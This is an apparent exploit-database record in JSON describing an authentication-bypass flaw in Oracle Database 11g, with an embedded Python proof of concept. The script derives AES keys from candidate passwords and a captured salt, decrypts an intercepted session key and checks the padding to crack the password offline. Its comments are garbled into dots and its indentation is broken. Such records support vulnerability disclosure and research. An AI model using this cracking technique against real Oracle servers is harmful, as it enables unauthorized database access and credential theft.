{"lastseen": "2020-04-01T19:04:39", "references": [], "description": "\nOracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. \nAn attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database. \nThis vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.", "edition": 1, "reporter": "Esteban Martinez Fayo", "exploitpack": {"type": "clientside", "platform": "windows"}, "published": "2015-01-05T15:36:30", "title": "Oracle-Database-Authentication", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:39", "rev": 2}, "score": {"value": 2.0, "vector": "NONE", "modified": "2020-04-01T19:04:39", "rev": 2}, "vulnersScore": 2.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-05T15:36:30", "id": "EXPLOITPACK:049162A0F7241C2E0149611DFC4EC651", "href": "", "viewCount": 1, "sourceData": "#-*-coding:utf8 -*-\n \nimport hashlib\nfrom Crypto.Cipher import AES\n \ndef decrypt(session,salt,password):\n pass_hash = hashlib.sha1(password+salt)\n \n #......... ..... ..... .......... .. 24 ....\n key = pass_hash.digest() + '\\x00\\x00\\x00\\x00'\n decryptor = AES.new(key,AES.MODE_CBC)\n plain = decryptor.decrypt(session)\n return plain\n \n #............. ........... ...... 48 ....\nsession_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'\n \n#.... 10 ....\nsalt_hex = 'A7193E546377EC56639E'\n \npasswords = ['test','password','oracle','demo']\n \n for password in passwords:\n session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)\n print 'Decrypted session_id for password \"%s\" is %s' % (password,session_id.encode('hex'))\n if session_id[40:] == '\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08':\n print 'PASSWORD IS \"%s\"' % password\n break", "cvss": {"score": 0.0, "vector": "NONE"}}

{}